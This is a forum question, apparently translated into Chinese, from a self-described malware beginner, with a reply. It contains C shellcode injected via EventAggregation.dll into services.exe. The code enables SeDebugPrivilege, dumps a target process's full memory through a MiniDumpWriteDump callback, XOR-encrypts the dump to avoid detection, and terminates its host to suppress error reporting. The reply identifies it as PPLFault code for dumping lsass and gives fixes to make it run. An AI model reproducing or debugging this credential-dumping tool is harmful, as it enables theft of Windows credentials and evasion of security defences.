我正在使用 MiniDumpWriteDump 回调将转储读入内存并在存储到文件之前对其进行加密。它作为 shellcode 的一部分执行,该 shellcode 是通过 services.exe 加载的 EventAggregation.dll 编写的。运行 MiniDumpWriteDump 后,后续代码行不会运行(我进行了测试以确保使用 abort() )。我在这方面缺少什么吗?我只是恶意软件开发的初学者。
#define _CRT_SECURE_NO_WARNINGS
#include <phnt_windows.h>
#include <phnt.h>
#include <DbgHelp.h>
#include <intrin.h>
#include <stdio.h>
#include "DumpShellcode.h"
#pragma optimize("", off)
PSHELLCODE_PARAMS GetParams();
// Overwrites DllMain (technically CRT DllMain)
BOOL APIENTRY Shellcode(
HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
PSHELLCODE_PARAMS pParams = NULL;
MiniDumpWriteDump_t pMiniDumpWriteDump = NULL;
HANDLE hProcess = NULL;
HANDLE hFile = NULL;
HMODULE hDbgHelp = NULL;
DWORD ignored = 0;
CallbackHelper helper;
helper.bytesRead = 0;
MINIDUMP_CALLBACK_INFORMATION callbackInfo = { 0 };
callbackInfo.CallbackRoutine = &minidumpCallback;
callbackInfo.CallbackParam = &helper;
pParams = GetParams();
// Resolve remaining import
hDbgHelp = pParams->pLoadLibraryW(pParams->szDbgHelpDll);
if (NULL == hDbgHelp)
{
__debugbreak();
}
pMiniDumpWriteDump = (MiniDumpWriteDump_t)pParams->pGetProcAddress(hDbgHelp, pParams->szMiniDumpWriteDump);
if (NULL == pMiniDumpWriteDump)
{
__debugbreak();
}
// Enable SeDebugPrivilege
if (0 != pParams->pRtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &ignored))
{
__debugbreak();
}
// Acquire handle to target
hProcess = pParams->pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pParams->dwTargetProcessId);
if (NULL == hProcess)
{
__debugbreak();
}
// Create output file
hFile = pParams->pCreateFileW(pParams->dumpPath, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (INVALID_HANDLE_VALUE == hFile)
{
__debugbreak();
}
helper.dumpBuffer = pParams->pHeapAlloc(pParams->pGetProcessHeap(), HEAP_ZERO_MEMORY, 1024 * 1024 * 75);
if (helper.dumpBuffer == NULL)
{
__debugbreak();
}
// Capture dump
if (!pMiniDumpWriteDump(hProcess, 0, 0, MiniDumpWithFullMemory, NULL, NULL, &callbackInfo))
{
__debugbreak();
}
int i;
for (i = 0; i <= helper.bytesRead; i++)
{
*((BYTE*)helper.dumpBuffer + i) = *((BYTE*)helper.dumpBuffer + i) ^ 0x4B1D;
}
if (!pParams->pWriteFile(hFile, helper.dumpBuffer, helper.bytesRead, NULL, NULL))
{
pParams->pCloseHandle(hFile);
__debugbreak();
}
pParams->pCloseHandle(hFile);
pParams->pHeapFree(pParams->pGetProcessHeap(), 0, helper.dumpBuffer);
helper.dumpBuffer = NULL;
// Don't trigger WER
(void)pParams->pTerminateProcess((HANDLE)-1, 0);
return TRUE;
}
PVOID WhereAmI()
{
return _ReturnAddress();
}
PSHELLCODE_PARAMS GetParams()
{
PUCHAR pSearch = (PUCHAR)WhereAmI();
for (;;pSearch++)
{
PSHELLCODE_PARAMS pCandidate = (PSHELLCODE_PARAMS)pSearch;
if ((MAGIC1 == pCandidate->magic1) && (MAGIC2 == pCandidate->magic2))
{
return pCandidate;
}
}
return NULL;
}
BOOL CALLBACK minidumpCallback(
PVOID callbackParam,
const PMINIDUMP_CALLBACK_INPUT callbackInput,
PMINIDUMP_CALLBACK_OUTPUT callbackOutput
)
{
pCallbackHelper helper = (pCallbackHelper)callbackParam;
LPVOID destination = 0, source = 0;
DWORD bufferSize = 0;
switch (callbackInput->CallbackType)
{
case IoStartCallback:
callbackOutput->Status = S_FALSE;
break;
case IoWriteAllCallback:
callbackOutput->Status = S_OK;
source = callbackInput->Io.Buffer;
destination = (LPVOID)((DWORD_PTR)helper->dumpBuffer + (DWORD_PTR)callbackInput->Io.Offset);
bufferSize = callbackInput->Io.BufferBytes;
helper->bytesRead += bufferSize;
memcpy((destination), (source), (bufferSize));
break;
case IoFinishCallback:
callbackOutput->Status = S_OK;
break;
default:
return TRUE;
}
return TRUE;
}
BOOL EndShellcode()
{
return TRUE;
}
执行后,我期望将加密转储写入目标文件,而事实上,目标文件的大小为零字节。
这是来自 PPLFault 的代码,我知道您想通过回调将 lsass 转储到内存中。如果你想使用 PPLFault 使用它的方式,这是一个 PIC,我认为你不能按原样使用
memcpy既然您添加了此函数,您还必须将其添加到 FunctionOrder.txt 中,以便将其编译为 shellcode。